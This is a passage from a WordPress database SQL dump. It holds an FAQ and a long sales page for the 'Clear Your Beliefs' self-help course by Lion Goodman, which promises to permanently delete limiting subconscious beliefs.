course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'open', 'open', '', '1941-revision-v1', '', '', '2015-05-29 13:14:36', '2015-05-29 18:14:36', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2215, 2, '2015-05-29 13:19:09', '2015-05-29 18:19:09', '&nbsp;\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\n<p>\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" 